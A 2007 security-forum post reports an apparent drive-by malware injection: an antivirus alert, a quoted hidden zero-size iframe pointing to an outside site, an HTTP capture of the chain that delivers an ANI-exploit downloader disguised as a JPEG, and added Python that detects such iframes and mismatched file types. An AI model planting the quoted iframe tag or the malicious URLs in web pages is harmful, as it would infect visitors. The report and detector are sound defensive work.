[Notice] The forum has been hit with a malicious iframe (挂马), everyone be careful! Admins please deal with it and investigate, and notify everyone who has visited the forum to scan for viruses!
2007-6-20 11:34 4550

It is 11:30 on 2007-6-20. With nothing to do I came over to 看雪 (Pediy) to have a look, and as soon as I opened it my antivirus software raised an alert.
時間        模件        物件        名稱        病毒        動作        使用者名稱        資訊
2007-6-20 11:27:09        IMON        檔案        http://www.if56.cn/ad.jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan                hklzt       

Viewing the page source, I found:
<iframe src=http://1111.845845.cn/xi.htm  width=0 height=0></iframe>
The forum has been hit with a malicious iframe!
It uses the image ad.jpg, which is the earlier ANI vulnerability.
Everyone take note!
Admins, please deal with this quickly!! Contempt (BS) for whoever did this!
Some information follows.

+++GET 2364+++
GET /xi.htm HTTP/1.0
Accept: */*
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1111.845845.cn
Connection: keep-alive

+++RESP 2364+++
HTTP/1.1 200 OK
Content-Length: 494
Content-Type: text/html
+++关闭 2364+++

+++GET 2365+++
GET /0002.js HTTP/1.0
Accept: */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1234.89111.cn
Connection: keep-alive

+++GET 2366+++
GET /ad.jpg HTTP/1.0
Accept: */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
Range: bytes=2470-
Unless-Modified-Since: Sat, 16 Jun 2007 18:35:28 GMT
If-Range: "x"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.if56.cn
Connection: keep-alive

+++GET 2367+++
GET /favicon.ico HTTP/1.0
Accept: */*
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1111.845845.cn
Connection: keep-alive

+++RESP 2366+++
HTTP/1.1 200 OK
Content-Length: 3759
Content-Type: image/jpeg
Last-Modified: Sat, 16 Jun 2007 18:35:28 GMT
Accept-Ranges: bytes
ETag: "0d8741c45b0c71:361"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 20 Jun 2007 03:27:10 GMT

+++RESP 2367+++
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 20 Jun 2007 03:27:10 GMT
+++关闭 2367+++
+++关闭 2365+++

+++GET 2368+++
GET /t1.aspx?id=37219617 HTTP/1.0
Accept: */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: ww3.tongji123.com
Connection: keep-alive

+++GET 2369+++
GET /lo/2.htm HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://1111.845845.cn/xi.htm
Accept-Language: zh-cn
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.if56.cn
Connection: keep-alive

+++RESP 2369+++
HTTP/1.1 200 OK
Content-Length: 410
Content-Type: text/html
+++关闭 2369+++

+++GET 2370+++
GET /lo/haha.js HTTP/1.0
Accept: */*
Referer: http://www.if56.cn/lo/2.htm
Accept-Language: zh-cn
UA-CPU: x86
If-Modified-Since: Sun, 10 Jun 2007 05:44:16 GMT
If-None-Match: "e66016222abc71:382"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.if56.cn
Connection: keep-alive

+++RESP 2370+++
HTTP/1.1 304 Not Modified
Date: Wed, 20 Jun 2007 03:27:12 GMT

Etag: "e66016222abc71:382"
+++关闭 2370+++

+++GET 2371+++
GET /favicon.ico HTTP/1.0
Accept: */*
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Maxthon; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 1111.845845.cn
Connection: keep-alive

+++RESP 2371+++
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 20 Jun 2007 03:27:12 GMT
+++关闭 2371+++

+++RESP 2368+++
HTTP/1.1 200 OK
Content-Type: text/html; charset=gb2312
Content-Length: 683
+++关闭 2368+++
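An added example (not code from the post or the forum) that implements the two checks a defender would run against a capture like the one above: flag iframes that are zero-sized or point off-site, and compare a response's declared Content-Type with the body's magic bytes, since the IMON alert fires on a Win32/TrojanDownloader.Ani.Gen file served as image/jpeg. The sample HTML, the ANI-shaped byte string and the host name bbs.example.com are constructed/assumed, not taken from the actual files.

```python
import re

# Constructed sample page, modelled on the injected tag quoted in the post.
SAMPLE_HTML = (
    '<html><body><h1>BBS</h1>'
    '<iframe src=http://1111.845845.cn/xi.htm  width=0 height=0></iframe>'
    '<iframe src="/help.htm" width="400" height="300"></iframe>'
    '</body></html>'
)

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)')


def find_hidden_iframes(html, own_host):
    """Return (src, reasons) for iframes that are zero-sized and/or off-site.

    own_host is the forum's own host name (assumed, e.g. 'bbs.example.com').
    """
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v.strip('"\'') for k, v in ATTR_RE.findall(m.group(1))}
        src = attrs.get('src', '')
        reasons = []
        if attrs.get('width') == '0' or attrs.get('height') == '0':
            reasons.append('zero-size')
        host = re.match(r'https?://([^/:]+)', src, re.IGNORECASE)
        if host and host.group(1).lower() != own_host.lower():
            reasons.append('off-site:' + host.group(1).lower())
        if reasons:
            findings.append((src, reasons))
    return findings


def classify_body(content_type, body):
    """Compare the declared Content-Type with the real file type.

    Returns (actual_type, mismatch). A RIFF container with an ACON form type is
    a Windows animated cursor (.ani), whatever extension or MIME type it wears.
    """
    if body.startswith(b'\xff\xd8\xff'):
        actual = 'image/jpeg'
    elif body[:4] == b'RIFF' and body[8:12] == b'ACON':
        actual = 'application/x-navi-animation'
    else:
        actual = 'unknown'
    declared = content_type.split(';')[0].strip().lower()
    return actual, declared != actual


# Constructed ANI-shaped header (RIFF <size> ACON anih ...), not the real ad.jpg.
FAKE_ANI = b'RIFF' + (3759 - 8).to_bytes(4, 'little') + b'ACON' + b'anih' + b'\x00' * 40
```

Run over a stored copy of a forum page and a downloaded "image", the first function isolates the zero-size off-site frame and the second reports that a body served as image/jpeg is actually an ANI file.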


kanxue 8 2007-6-20 11:52
It may be a problem with your own machine or your LAN; we don't see this problem on our side.
baby2008 28 2007-6-21 12:39
The OP was probably hit by an ARP spoofing trojan.